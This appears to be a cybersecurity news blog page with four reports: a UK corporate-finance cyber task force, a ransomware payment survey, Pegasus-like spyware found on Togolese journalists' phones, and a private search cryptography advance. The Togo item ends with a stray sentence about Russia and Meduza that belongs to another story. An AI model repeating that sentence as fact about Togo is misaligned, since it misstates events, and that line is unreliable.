The effort is being led by the Institute of Chartered Accountants in England and Wales (ICAEW) in partnership with the National Cyber Security Centre. Other representatives from banking, law, consulting, and other fields include the Association of Corporate Treasurers, the British Private Equity and Venture Capital Association, Deloitte, EY, KPMG, the Law Society, the London Stock Exchange, the Takeover Panel, and UK Finance.

During the task force's launch earlier this week, the 14 organisations published new regulations meant to help businesses mitigate cyber-risk while engaging in corporate finance activities, such as capital raising, mergers and acquisitions, and initial public offerings. 

Important guidelines regarding building resilience against cyberattacks, protecting commercially sensitive data shared during deal processes, and responding to breaches were all included in Cyber Security in Corporate Finance. Additionally, it will include important details about various cyber-risks. 

According to Michael Izza, CEO of ICAEW, organisations may be vulnerable to security breaches when confidential information is shared during a transaction. 

“A cyber-attack could have a potentially disastrous impact on the dealmaking process, and so it is crucial that boardrooms across the country treat threats very seriously and take preventative action,” Izza added. “We must do all that we can to ensure London remains a pre-eminent place to do deals, raise investment and generate growth.” 

Sarah Lyons, NCSC deputy director for economy and society, stated that chartered accountants are becoming an increasingly appealing target for threat actors due to the sensitive financial and risk data they handle. 

A breach in this sector can not only jeopardise organisations and their customers, but can also undermine trust, confidence and reputation. I'd encourage everyone from across the industry to engage with this report and the NCSC's range of practical guidance, to help increase their cyber resilience, Lyons advised.
Read more »
Threat Landscape
Business Security Cyber Security Data Backup Ransomware attack Threat Landscape

Cohesity Research Shows That Most Firms Break Their "Do Not Pay" Policies by Paying Millions in Ransoms

 

While a "do not pay" ransomware policy may sound appealing in theory, thwarting attackers' demand for ransom in exchange for stolen data is easier said than done. A recent study conducted by Cohesity, a leader in AI-powered data security management, reveals this truth.

The study surveyed over 900 IT and security decision makers who "take an if not when" approach regarding cyberattacks on their business. According to the study, 94% of participants stated that their organisation would pay a ransom to retrieve data and resume commercial operations, with 5% responding, "Maybe, depending on the ransom amount." 

The majority of those surveyed had paid a ransom in the previous two years, and the vast majority predicted that the threat of cyberattacks will increase dramatically by 2024. Worryingly, 79% of respondents reported that their firm has been the victim of a ransomware assault between June and December 2023. As a result, 96% of respondents believe the threat of cyberattacks to their industry would increase this year, with 71% expecting it to increase by more than 50%. 

9 out of 10 companies paid ransom 

Sixty-seven percent of respondents stated their organisation would be prepared to pay more than $3 million to retrieve data and restore business processes, while 35% were willing to pay $5 million as ransom. The study also demonstrated the need of being able to respond and recover, as 9 in 10 respondents indicated their organisation had paid a ransom in the previous two years, despite 84% claiming their company had a "do not pay" policy.

"Organisations can't control the increasing volume, frequency, or sophistication of cyberattacks such as ransomware," explained Brian Spanswick, Cohesity's chief information security officer and head of IT. "What they can control is their cyber resilience, which is the ability to respond quickly and recover. 

Expanding ransomware tactics

Since every ransomware incident is unique, the best people to determine whether or not to pay a ransom should be law enforcement or the cyber insurance provider for a company. Now, it appears that each ransomware attack is becoming more sophisticated and intense as the attack surface keeps expanding. 

Delinea, a privileged access management (PAM) company, stated in its annual State of Ransomware report that the growing quantity and frequency of ransomware assaults indicate a shift in attackers' strategy. 

According to Delinea, new tactics that use "stealth" to exfiltrate sensitive and private data have supplanted the tried and tested approaches of crippling a business and holding it hostage. For this motive, hackers usually make threats to either exploit the data to secure an attractive cyber insurance payout or sell it to the highest bidder on the darknet. 

Remember that external as well as internal sources can pose a threat to an organisation's cybersecurity. 90% of respondents stated insider threats are more or equally difficult to identify and avoid than external attacks, as the Securonix 2024 Insider Threat Report attests.
Read more »
Togo
Africa Cyber Security NSO Spyware Threat Landscape Togo

Pegasus Spyware Targets Two Journalists in Togo: RSF

 

Reporters Without Borders (RSF) disclosed that two journalists in Togo had spyware on their phones that looked similar to the potent Pegasus surveillance tool used by the NSO group. RSF reports that the journalists are accused of defaming a government minister and are currently on trial for it. Since 1963 the nation of West Africa has been ruled by the same repressive royal family. 

RSF was unclear about the detected spyware, stating only that the "traces are typical of Pegasus." According to RSF, the Togo government employed Pegasus until at least 2021, and one of the two targeted journalists was exposed to a "major cyber-espionage operation throughout the first half of 2021.” 

RSF reported that Loïc Lawson, publisher of Flambeau des Démocrates, had 23 spyware attacks on his phone from February to July 2021. A second journalist, freelancer Anani Sossou, was targeted many months later, in October 2021. 

RSF stated that its forensic service for journalists, Digital Security Lab, conducted months of investigation, and Amnesty International's Security Lab corroborated its findings in an independent analysis. 

The organisation began probing the alleged phone tampering in December, roughly three weeks after the journalists were detained. Their arrest followed a complaint from Togo's minister of urban planning, housing, and land reform, who objected to their reporting disclosing the theft of approximately 600,000 Euros (nearly $650,000) in cash from his home.

According to RSF, the journalists were accused of undermining the minister's image and "inciting revolt" at a trial that began last month. While investigating the arrests, RSF stated in a press statement that it "discovered that [the journalists] had in fact been in the crosshairs of the Togolese authorities for a long time." 

The findings mark the first verified incident of spyware being used against journalists in Togo. Pegasus spyware has frequently targeted journalists, human rights campaigners, and opposition party leaders around the world in recent years. Researchers say the attack took place in February, shortly after the Russian government banned Timchenko's journal, Meduza, for being critical of Russia's invasion of Ukraine.
Read more »
User Security
Cryptography Cyber Security Data Privacy Threat Landscape User Security

Cryptographers Groundbreaking Discovery Enables Private Internet Searches

 

The desire for private internet searches has long been a cryptographic challenge. Historically, getting information from a public database without disclosing what was accessed (known as private information retrieval) has been a difficult task, particularly for large databases. The perfection of a private Google search, in which users can browse through material anonymously, has remained elusive due to the computational demands of such operations. 

However, a new study by three pioneering researchers has made tremendous progress in this field. They developed an innovative version of private information retrieval and expanded it to create a larger privacy method. This technique has been recognised for its pioneering potential, with plaudits expected at the annual Symposium on Theory of Computing in June 2023. 

Breaking barriers in cryptography

This development is based on a new way for discretely pulling information from huge datasets. It addresses the significant challenges of doing private searches across large databases without requiring a corresponding increase in computational effort. This technology is game-changing because it streamlines the process of conducting private searches, making them more viable and efficient. 

The strategy involves creating the database and encoding the entire dataset into a unique structure. This allows inquiries to be answered using only a small section of the structure. This novel approach indicates that a single server can host the information and do the preprocessing independently, enabling future users to retrieve data securely without incurring additional computing costs.

The future of online privacy 

While this breakthrough is noteworthy, practical applications are still being developed. The preprocessing method, as it stands, is most beneficial for extremely big databases and may not be realistic for everyday use due to existing processing performance and storage restrictions. 

Nonetheless, the research community remains optimistic. The history of cryptography reveals a similar pattern of optimising initially difficult outcomes into feasible ones. If the trend continues, private lookups from huge databases could become a reality, drastically changing our connection with the internet and significantly improving user privacy. 

A theoretical breakthrough

The new technique, invented by three cryptographers, employs a sophisticated kind of private information retrieval. It tackles the difficulty of executing private searches across large data sets without requiring additional computer resources. This concept is a major change from standard procedures, which frequently necessitate scanning whole databases to ensure secrecy. 

In a nutshell recent developments in cryptography are an important step towards enabling completely secure internet searches. This advancement has the potential to revolutionise how we access and interact with information online, putting user privacy and security first in an increasingly digital environment.
Read more »
Subscribe to: Posts (Atom)